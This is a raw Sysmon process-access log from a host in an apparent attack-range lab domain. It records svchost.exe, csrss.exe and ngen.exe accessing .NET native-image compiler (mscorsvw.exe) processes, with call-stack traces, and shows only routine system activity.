13:50:14.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9216-6005-C303-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.978{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9216-6005-C303-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:14.978{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9216-6005-C303-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:14.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9216-6005-C203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:14.337{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9216-6005-C203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:14.337{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9216-6005-C203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CE03-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.806{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CE03-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.806{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CE03-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.744{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CD03-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.728{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CD03-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.728{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CD03-00000000A301}3124C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CC03-00000000A301}2368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.666{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CC03-00000000A301}2368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.666{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CC03-00000000A301}2368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.603{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CB03-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.587{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CB03-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.587{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CB03-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.509{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-CA03-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.509{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-CA03-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.509{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-CA03-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.415{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C903-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.415{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C903-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
